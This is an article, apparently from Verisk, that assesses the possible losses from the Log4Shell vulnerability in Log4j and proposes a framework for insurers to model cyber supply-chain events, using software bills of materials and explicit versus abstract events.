You’d have to have been living under a rock in December 2021 not to have heard of the Log4Shell vulnerability. Log4Shell is the name given to a zero-day vulnerability in the Log4j logging library. The library is a common component of many Java programs, which is itself one of the most used programming languages. As such, the vulnerability, which was privately disclosed to the library’s creators on November 24, 2021, and publicly disclosed on December 9, is present in a very large number of programs.
Making matters worse, the vulnerability is straightforward to execute and allows for remote code execution. This ease of execution makes it far worse than other widespread and dangerous vulnerabilities, such as Meltdown and Spectre (a pair of hardware vulnerabilities discovered in 2017).
How Bad Is Log4Shell and How Bad Could It Be?
Before addressing how bad it is, let’s tackle the easier question: How bad could it be? The vulnerability is a perfect storm: It’s present in a very widely used library; it’s easy to exploit; and the consequences—remote code execution—are severe.
Therefore, the worst-case scenario is clear: The losses from Log4Shell could surpass those of NotPetya. This certainly applies from the perspective of ground-up (economic) loss , estimated at USD 10 billion, or from the perspective of gross losses to affirmative cyber insurance policies, estimated at over USD 300 million.
To attempt to answer the question of how bad Log4Shell is, one must examine the various sources of uncertainty.
The first source of uncertainty is on the technical side. The mere fact that a program uses a vulnerable version of Log4j doesn’t necessarily mean the program will be vulnerable to it. The feature of Log4j that allows for this vulnerability—called JNDI lookups—may, for example, have been turned off. It’s turned on by default, however, so this isn’t a likely scenario.
Another factor is the way that the logging library is used by a program. The library is only one component within a larger program, so it may be that there isn’t a way to trigger the vulnerability because the user can’t directly control what gets logged by Log4j. As it stands, the most complete list of affected programs we’ve been able to find is available from the Cybersecurity and Infrastructure Security Agency’s Github page (Table 1).
|Unknown (default)||Affected||Not Affected||Fixed||Under Investigation|
These are mutually exclusive categories, so the fixed programs were in the affected category earlier on. Obviously, there are far more than 2,000 software programs in the world, but this is still useful information. Among those programs known either to have been or not to have been affected, approximately 30% were affected—more than 80% of which weren’t fixed within two weeks of public disclosure.
We can therefore conclude that an extraordinarily large number of programs are indeed affected and that most don’t even have patches available at this time. It is not unexpected for a sizeable organization to have one or more impacted programs. It is a reasonable assumption that it will be a long time before vendors issue patches for most programs, and even longer before those patches are installed by most organizations.
Another source of uncertainty is what malicious threat actors will use the vulnerability for. As noted by SC Media, the first to exploit new vulnerabilities are typically botnets and cryptocurrency miners—there is evidence that they were already trying “spray and pray” tactics within hours of public disclosure. These kinds of attacks aren’t particularly damaging to organizations, but more costly attacks such as data compromise or ransomware are sure to occur (and to have already occurred) as well.
It should also be noted that, unlike events such as WannaCry, NotPetya, or a long cloud downtime event, the Log4Shell “event” should more accurately be described as a large number of distinct events, carried out by multiple threat actors with distinct objectives. Moreover, it is quite possible that many events in which systems were compromised due to the Log4Shell vulnerability will never be identified as such. Thus, the true losses from Log4Shell may never be known.
Modeling Cyber Supply Chain Events
Last year saw numerous major cyber supply chain events, beginning with SolarWinds, followed by Accellion, the Microsoft Exchange Server hacks, and Kaseya. Creating a model of such events poses numerous challenges, especially when building a probabilistic model.
First, the list of potential supply chain events is at least as long as the list of software programs, as any of these could have a vulnerability that serves as a point of aggregation (a single point of failure). Clearly, it is futile to try to create a comprehensive list of all software. It follows that any supply chain model will never be complete from the point of view of the list of potential events.
But what if the goal is for a model to have reasonably complete coverage of the costliest events? In principle, one could compile a list of the most used programs, along with estimates of how many customers each has. The Log4Shell vulnerability illustrates, however, why such a list would be insufficient: the potential points of aggregation include not only individual programs but also libraries and components of programs.
Attempting to create a comprehensive list of widely used libraries, including those that are open source, is another futile endeavor. Moreover, the creation of such a list would be only one step in estimating potential losses, as it would also be necessary to know what programs the libraries are used in—something that isn’t currently tracked. It is for this reason that the list of programs vulnerable to Log4Shell is being constructed by crowdsourcing weeks after the vulnerability’s public disclosure. A complicating factor, as previously mentioned, is that not all programs that use an impacted version of log4j will necessarily be vulnerable.
Ultimately, estimating potential losses from supply chain attacks—including those that impact libraries—will require tracking the libraries and components that are part of various pieces of software. This concept is known as a software bill of materials (SBoM), which is like a list of ingredients for software. As early as 2014, the U.S. proposed legislation that would have required government agencies to obtain SBoMs for any products they purchased. The legislation didn’t pass, but with the recent increase in high profile supply chain attacks, there has been renewed interest in SBoM mandates. For the moment, however, SBoMs are only a proposal and a supply chain model must therefore do without them.
Taking these issues into account, supply chain models must be built bearing in mind that any explicit list of potential points of aggregation is going to be far from complete from the perspectives of both event frequency and potential losses. Verisk therefore proposes a framework consisting of a mix of explicit and abstract events.
Explicit events would model scenarios for known points of aggregation. As is generally the case with Verisk’s cyber models, detailed data on which companies use which affected points of aggregation should be used where available. It is used for our various service provider downtime event models, for example.
Abstract events, on the other hand, would model events for unknown points of aggregation. Notably, the latter category would include software libraries. In either a deterministic or probabilistic model, expert opinion would be used to determine (a distribution for) the proportion of companies that are vulnerable to the abstract event. In the context of a probabilistic model, expert opinion would also be used to estimate the proportion of abstract events, which are those not covered by the known explicit events.
Beyond the differentiation between explicit and abstract events, a model must also take into consideration that, for some events, not every company that uses the affected point of aggregation will necessarily be impacted. This comes down to the compromise mechanism. In some cases, a compromised supplier could be used as a means of distributing malware to that supplier’s clients, in which case the vast majority of clients would indeed be impacted.
But in a case such as Log4Shell, the point of aggregation simply opens a vulnerability that attackers can exploit if they choose to (and act quickly enough). Thus, not every vulnerable company will be impacted. This is what we refer to as the incomplete aggregation framework and it is currently used by Verisk to model systemic ransomware events such as WannaCry and NotPetya. As cyber risk continues to evolve, only Verisk offers a holistic view for managing cyber risk across the insurance value chain.